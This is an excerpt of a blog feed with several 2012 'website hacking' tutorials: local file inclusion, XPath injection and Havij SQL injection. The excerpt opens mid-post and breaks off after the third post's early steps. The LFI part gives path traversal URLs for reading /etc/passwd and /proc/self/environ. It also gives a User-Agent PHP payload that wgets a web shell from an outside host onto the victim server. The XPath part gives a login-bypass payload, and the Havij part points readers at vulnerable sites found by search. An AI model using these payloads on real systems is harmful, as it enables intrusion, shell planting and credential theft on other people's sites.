&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; ../../etc/passwd&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;and if Local File Inclusion vulnerable site url like&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;www.site.com/test.php?main=lol&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;well that means the include has .php with it as in&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: #38761d;"&gt; PHP Code:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; include $main.'.php';&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;well actually we know that mean the .php comes to the end of it so we have to use the nullbyte for this one.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; ../etc/passwd&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 3:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Checking if proc/self/environ is accessible&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;www.website.com/view.php?page=../../../../../proc/self/environ&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;If you get something like&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.website.com Port 80&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible or the OS is FreeBSD.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 4:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Injecting malicious code&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; www.website.com/view.php?page=../../../../../proc/self/environ&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Choose Tamper and in User-Agent filed write the following code :&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;lt;?system(‘wget http://hack-bay.com/Shells/gny.txt -O shell.php’);?&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Then submit the request.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Our command will be executed (will download the txt shell from http://hack-bay.com/Shells/gny.txt and will save it as shell.php in the website directory) through system(), and our shell will be created.If don’t work,try exec() because system() can be disabled on the webserver from php.ini.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Step 5: Access our shell&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Now lets check if our&amp;nbsp;malicious&amp;nbsp;code was successfully injected.Lets check if the shell is present.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;www.website.com/shell.php&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Our shell is there.Injection was&amp;nbsp;successfully.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;So friends, I hope you will like this&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Local File Inclusion Tutorial....&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;I have personally tested this Website Hacking Tutorial and found all are working. If you have any problem in above Website hacking Using&amp;nbsp;Remote&amp;nbsp;File Inclusion Tutorial, please mention it in comments section.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;style type="text/css"&gt;
.btnLogin{

    -moz-border-radius:2px;

    -webkit-border-radius:2px;

    border-radius:15px;

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #badff3, #7acbed);

    background:-webkit-gradient(linear, center top, center bottom, from(#badff3), to(#7acbed));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#badff3', EndColorStr='#7acbed')";

    border:1px solid #7db0cc !important;

    cursor: pointer;

    padding:11px 16px;

    font:bold 11px/14px Verdana, Tahomma, Geneva;

    text-shadow:rgba(0,0,0,0.2) 0 1px 0px;

    color:#fff;

    -moz-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    -webkit-box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    box-shadow:inset rgba(255,255,255,0.6) 0 1px 1px, rgba(0,0,0,0.1) 0 1px 1px;

    margin-center:12px;

    float:center;

    padding:7px 21px;

}


.btnLogin  : hover,

.btnLogin::focus,

.btnLogin : active{

    background:#a1d8f0;

    background:-moz-linear-gradient(top, #7acbed, #badff3);

    background:-webkit-gradient(linear, center top, center bottom, from(#7acbed), to(#badff3));

    -ms-filter: "progid:DXImageTransform.Microsoft.gradient(startColorStr='#7acbed', EndColorStr='#badff3')";

}

.btnLogin:active{

    text-shadow:rgba(0,0,0,0.3) 0 -1px 0px;

}
&lt;/style&gt;
&lt;!-- Start of Message Alert --&gt;
&lt;!-- Use this button in a form to pop-up a message when the user clicks it --&gt;
&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('Remember Hacking Is Crime.This tutorial is Educational purpose only.Do not Misuse It.'); return true" type="button" value="Remember" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/7688265163019223885/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=7688265163019223885&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/7688265163019223885?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/7688265163019223885?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/web-site-hacking-by-local-file.html' title='Web site Hacking by Local File Inclusion (LFI)'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-53bt2rYvRXQ/UIBW_KVdDSI/AAAAAAAAAPQ/NcUkp6ZIy0g/s72-c/lfi.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CEAHQHszeSp7ImA9WhNTFUU.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-4797495504466914511</id><published>2012-10-18T23:52:00.000+06:00</published><updated>2012-10-18T23:52:11.581+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-18T23:52:11.581+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='web Site Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><category scheme='http://www.blogger.com/atom/ns#' term='Internet'/><title>Xpath Injection Website Hacking Technic !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Everyday many website gets hacked by hackers but most of the hackers are hacking those website just for popularity nothing else. Today i am writing this tutorial on XPath Injection, in which i will explain you, How Hackers Hack Website Using XPath Injection.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;In a typical Web Application architecture, all data is stored on a Database server. This Database server store data in various formats like an LDAP, XML or RDBMS database. The application queries the server and accesses the information based on the user input.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Normally attackers try to extract more information than allowed by manipulating or using the query with specially crafted inputs.Here, in this tutorial we’ll be discussing XPATH Injection techniques to extract data from XML databases.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;Don’t forget to Subscribe to our &lt;a href="http://made-by-bangladesh.blogspot.com/feeds/posts/default" target="_blank"&gt;RSS feed&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;XPath Injection Tutorial To Hack Websites Database&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Before we go deeper into XPATH injection lets take a brief look at what XML and XPath.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;What is XML?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;XML stands for Extensible Markup Language and was designed or used to describe data. It provide platform for programmers to create their own customized tags to store data on database server. An XML document is mostly similar to an RDBMS Database except for the way data is stored in them. In case of a normal database, data is stored in a table rows and columns and in XML the data is stored in nodes in a tree form.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;What is XPath?&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;XPath is a query language used to select data from XML data sources. It is increasingly common for web applications to use XML data files on the back-end, using XPath to perform queries much the same way SQL would be used against a relational database.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;XPath injection, much like SQL injection, exists when a malicious user can insert arbitrary XPath code into form fields and URL query parameters in order to inject this code directly into the XPath query evaluation engine. Doing so would allow a malicious user to bypass authentication (if an XML-based authentication system is used) or to access restricted data from the XML data source.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Lets learn with the help of examples that will show how XPath works, Let's assume that our database is represented by the following XML file:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;lt;?xml version="1.0" encoding="ISO-8859-1"?&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;users&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;user&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;username&amp;gt;wildhacker&amp;lt;/username&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;password&amp;gt;123&amp;lt;/password&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;account&amp;gt;admin&amp;lt;/account&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;/user&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;user&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;username&amp;gt;cutler&amp;lt;/username&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;password&amp;gt;jay&amp;lt;/password&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;account&amp;gt;guest&amp;lt;/account&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;/user&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;user&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;username&amp;gt;ronie&amp;lt;/username&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;password&amp;gt;coleman&amp;lt;/password&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;account&amp;gt;guest&amp;lt;/account&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;/user&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; &amp;lt;/users&amp;gt;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;The above code show how username,password and user account details stored in XML file.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Following XPath query is used to returns the account whose username is "wildhacker" and the password is&lt;/span&gt; &lt;span style="color: magenta;"&gt;"123" : ,&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt;&lt;span style="color: magenta;"&gt; string(//user[username/text()='gandalf' and password/text()='!c3']/account/text())&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;If the application developer does not properly filter user input, the tester or hacker will be easily able to inject XPath code and interfere with the query result. For instance, the hacker or tester could input the following values:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp;&lt;b&gt; Username: &lt;span style="color: magenta;"&gt;' or '1' = '1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp; &amp;nbsp; Password: &lt;span style="color: magenta;"&gt;' or '1' = '1&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Using these above parameters, the query becomes:&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; string(//user[username/text()='' or '1' = '1' and password/text()='' or '1' = '1']/account/text())&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;As in most of the common SQL Injection attack, we have created a query that always evaluates to true, which means that the application will authenticate the user even if a username or a password have not been provided.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;And as in a common SQL Injection attack, with XPath injection, the first step is to insert a single quote (') in the field to be tested, introducing a syntax error in the query, and to check whether the application returns an error message.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;If there is no knowledge about the XML data internal details and if the application does not provide useful error messages that help us reconstruct its internal logic, it is possible to perform a Blind XPath Injection attack(i will explain that in next tutorials), whose goal is to reconstruct the whole data structure. The technique is similar to inference based SQL Injection, as the approach is to inject code that creates a query that returns one bit of information.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;That’s it.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: magenta;"&gt;&lt;b&gt;&lt;i&gt;So friends, I hope you will like this&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;center&gt;
&lt;form&gt;
&lt;input class="btnLogin" onclick="alert('XPath Injection Tutorial For Website Hacking....
If you have any queries or doubts related about XPath Injection Tutorial, you can ask in form of comments, please mention it in comments section.This tutorial is Educational purpose only.Do not Misuse It.'); return true" type="button" value="Remember" /&gt;
&lt;/form&gt;
&lt;/center&gt;
&lt;!-- End of Message Alert --&gt;
&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://made-by-bangladesh.blogspot.com/feeds/4797495504466914511/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=921095381650575288&amp;postID=4797495504466914511&amp;isPopup=true' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4797495504466914511?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/921095381650575288/posts/default/4797495504466914511?v=2'/><link rel='alternate' type='text/html' href='http://made-by-bangladesh.blogspot.com/2012/10/xpath-injection-website-hacking-technic.html' title='Xpath Injection Website Hacking Technic !'/><author><name>Sajal Mondal</name><uri>https://plus.google.com/110516349656262710148</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='32' src='//lh6.googleusercontent.com/-PWKcdujUFv8/AAAAAAAAAAI/AAAAAAAAASY/dzhIK6bFxxY/s512-c/photo.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DEEBR3w7cCp7ImA9WhNTFUs.&quot;'><id>tag:blogger.com,1999:blog-921095381650575288.post-4139384894629238411</id><published>2012-10-18T19:24:00.001+06:00</published><updated>2012-10-18T19:24:16.208+06:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2012-10-18T19:24:16.208+06:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='Hacking google web Database'/><category scheme='http://www.blogger.com/atom/ns#' term='keylogger'/><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><category scheme='http://www.blogger.com/atom/ns#' term='Web Devolopment'/><title>Web Site Hacking Using Havij SQL Injction Manual !</title><content type='html'>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="color: #38761d;"&gt;&lt;b&gt;Hello Visitor ,&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-h7L1dkyoFSA/UIACiNWnu8I/AAAAAAAAAO8/hH_6MVlKj3I/s1600/sql_injection.gif" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-h7L1dkyoFSA/UIACiNWnu8I/AAAAAAAAAO8/hH_6MVlKj3I/s1600/sql_injection.gif" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="color: #38761d; font-weight: bold;"&gt;Today I'll Explain How to hack website using Havij SQL Injection.Already I have written so many articles on website hacking in that i have explained how to find sql vulnerable website and how to hack that website database etc, today in this article I am going to write on more website hacking tutorial using Havij SQL Injection. Using Havij SQL Injection, you can easily hack website username and password.&lt;/span&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;Havji is a SQL injection tool. But is has more great skills like finding Admin panel, cracking hash. You can use it instead of the ordinary way of SQL injection. Its especially for beginners a uselful program.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;
&lt;b&gt;&lt;span style="color: #38761d;"&gt;By using Havij SQL Injection tool you will get bellow information of website,&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp; &amp;nbsp; &lt;b&gt;&lt;span style="color: magenta;"&gt;Database Name&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Decrypt MD5 Code&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Table Name&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Columns Name&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: magenta;"&gt;&amp;nbsp; &amp;nbsp; Columns Data&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Steps To Hack Website Using Havij SQL Injection&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 1:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;First download Havij SQL Injection&amp;nbsp;&lt;a href="http://www.itsecteam.com/files/havij/Havij1.15Free.rar" target="_blank"&gt;Version 1.15&lt;/a&gt;&amp;nbsp;, &lt;a href="http://www.itsecteam.com/files/havij/Havij1.14Free.rar" target="_blank"&gt;Version 1.14&lt;/a&gt;&amp;nbsp;, &lt;a href="http://www.itsecteam.com/files/havij/Havij1.13Free.rar" target="_blank"&gt;Version 1.13&lt;/a&gt;&amp;nbsp;,&lt;a href="http://www.itsecteam.com/files/havij/Havij1.12Free.rar" target="_blank"&gt;Version 1.12&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: #cc0000;"&gt;&lt;b&gt;Step 2:&lt;/b&gt;&lt;/span&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Run Havij SQL Injection software and copy and paste vulnerable website link as shown in figure,&lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style="color: #38761d;"&gt;Refer previous article of website hacking to find vulnerable website By Google Dork.&lt;/span&gt;&lt;/b&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-ixJZB-Jl0Vo/UH_8oIF-xBI/AAAAAAAAAOg/hiFr-nCws6s/s1600/hv1.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://3.bp.blogspot.com/-ixJZB-Jl0Vo/UH_8oIF-xBI/AAAAAAAAAOg/hiFr-nCws6s/s320/hv1.bmp" width="310" /&gt;&lt;/a&gt;&lt;/div&gt;
&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;br /&gt;
&lt;b&gt;&lt;span style="color: #cc0000;"&gt;Step 3:&lt;/span&gt;&lt;/b&gt; &lt;b&gt;&lt;span style="color: #38761d;"&gt;Now click in the "Analyze" Button,See Image&amp;nbsp;&lt;/span&gt;&lt;/b&gt;&lt;span style="color: #38761d;"&gt;&lt;b&gt;Below.&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-ZwY2PA6KKGo/UH_9M-8OR3I/AAAAAAAAAOo/zgmfxxNzEKk/s1600/hv2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://2.bp.blogspot.com/-ZwY2PA6KKGo/UH_9M-8OR3I/AAAAAAAAAOo/zgmfxxNzEKk/s320/hv2.bmp" width="312" /&gt;&lt;/a&gt;&lt;/div&gt;
